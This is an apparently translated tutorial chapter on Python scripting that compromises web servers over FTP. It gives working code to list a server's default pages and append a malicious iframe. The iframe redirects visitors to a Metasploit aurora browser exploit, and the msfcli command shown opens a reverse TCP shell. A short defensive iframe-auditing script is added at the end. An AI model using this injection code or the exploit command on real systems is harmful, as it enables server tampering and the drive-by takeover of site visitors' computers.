
[Advanced Python scripting] 2.3. Compromising hosts in batches via FTP and the web (part 2): searching an FTP server for web pages + injecting code


Contents

1. Searching for web pages on the FTP server

1.1 Functions:

1.2 Implementation:

2. Adding malicious injection code to web pages

2.1 Analysis:

2.2 Functions:

2.3 Implementation:


1. Searching for web pages on the FTP server

1.1 Functions:

ftp.nlst(): returns the list of files in the specified directory on the FTP server

fileName.lower(): converts all uppercase letters in the string to lowercase

1.2 Implementation:

Once the login credentials for the FTP server are known, the next step is to test whether the server also provides a web service.


First, list all the files in the FTP directory and search for default web pages. The returnDefault() function takes an FTP connection as its argument and returns an array of the default web pages it finds. It does this by issuing the NLST command (the command that lists all files in a directory). The function checks the name of each file returned by NLST against the default web page file names and adds every default page it finds to an array named retList. After completing this iteration, the function returns the array.


Run: python defaultPages.py

import ftplib

def returnDefault(ftp):
    try:
        dirList = ftp.nlst()
    except:
        dirList = []
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return
    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] Found default page: ' + fileName)
            retList.append(fileName)
    return retList

host = '192.168.190.131'
userName = 'guest'
password = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, password)
returnDefault(ftp)


2. Adding malicious injection code to web pages

2.1 Analysis:

Once the web page files have been found, they are infected with malicious redirection code. To quickly set up a malicious server and page at http://xx.xx.xx.xx:8080/exploit, the Metasploit framework is used, with the ms10_002_aurora module. The page at ip:8080/exploit exploits a vulnerability in any browser that is redirected to it, making the browser open a reverse connection through which the compromised host (the "肉機", or bot) can be controlled.

msfcli exploit/windows/browser/ms10_002_aurora
LHOST=xx.xx.xx.xx SRVHOST=xx.xx.xx.xx URIPATH=/exploit
PAYLOAD=windows/shell/reverse_tcp LHOST=xx.xx.xx.xx LPORT=443 E


If a vulnerable browser connects to the server at http://xx.xx.xx.xx:8080/exploit, it executes the exploit code. On success, a reverse TCP shell is created, giving a Windows command prompt on the compromised computer. With this command shell, commands can be executed on the compromised host with administrator privileges.


Next, a piece of code that redirects to the malicious server is added to a normal web page on the compromised server. The default web page is downloaded from the compromised server, an iframe is inserted into it, and the page with the malicious code inserted is then sent back to the compromised server.


The injectPage() function takes an FTP connection, a page name, and the iframe string used for the redirection, and downloads a temporary copy of the web page. Next, it appends the iframe that redirects to the malicious server to this temporary file. Finally, the function sends the infected web page back to the compromised server.

2.2 Functions:

ftp.retrlines(): uses the RETR command to retrieve a file's contents line by line


storlines(cmd, f): given an FTP command (such as "STOR filename"), uploads a text file


ftplib.FTP class: implements the client side of the FTP protocol; it can be used to write Python programs that perform various FTP tasks

2.3 Implementation:

python injectPage.py

import ftplib

def injectPage(ftp, page, redirect):
    f = open(page + '.tmp', 'w')
    ftp.retrlines('RETR ' + page, f.write)
    print('[+] Downloaded Page: ' + page)
    f.write(redirect)
    f.close()
    print('[+] Injected Malicious IFrame on: ' + page)
    ftp.storlines('STOR ' + page, open(page + '.tmp'))
    print('[+] Uploaded Injected Page: ' + page)

host = '192.168.190.131'
userName = 'guest'
passWord = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = '<iframe src= '+'"http://xx.xx.xx.xx:8080/exploit"></iframe>'
injectPage(ftp, 'index.html', redirect)
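
From the defender's side, the tampering described above leaves a recognisable trace: an iframe appended after the closing </html> tag that points at a host the site does not own. The following is an added example, not code from the original article, that audits a page for that pattern; the allowlist, the 203.0.113.10 address and both sample pages are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeAuditor(HTMLParser):
    """Collect every iframe src and whether it appears after </html>."""
    def __init__(self):
        super().__init__()
        self.html_closed = False
        self.iframes = []  # list of (src, appeared_after_html_close)

    def handle_starttag(self, tag, attrs):
        if tag == 'iframe':
            src = dict(attrs).get('src') or ''
            self.iframes.append((src.strip(), self.html_closed))

    def handle_endtag(self, tag):
        if tag == 'html':
            self.html_closed = True

def audit_page(html_text, allowed_hosts):
    """Return [(src, [reasons])] for iframes that look injected."""
    parser = IframeAuditor()
    parser.feed(html_text)
    parser.close()
    findings = []
    for src, trailing in parser.iframes:
        reasons = []
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        if host and host not in allowed_hosts:
            reasons.append('off-site host ' + host)
        if trailing:
            reasons.append('appended after </html>')
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed sample pages: a clean page, and the same page with a trailing iframe.
CLEAN = '<html><body><iframe src="/widgets/map.html"></iframe></body></html>\n'
TAMPERED = CLEAN + '<iframe src="http://203.0.113.10:8080/exploit"></iframe>'
ALLOWED = {'www.example.org'}  # hypothetical allowlist of the site's own hosts

if __name__ == '__main__':
    for name, page in (('clean', CLEAN), ('tampered', TAMPERED)):
        print(name, audit_page(page, ALLOWED))
```

Run against the web root on a schedule and paired with a file-hash baseline, a check like this flags pages that were modified over FTP even when the visible content is unchanged.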

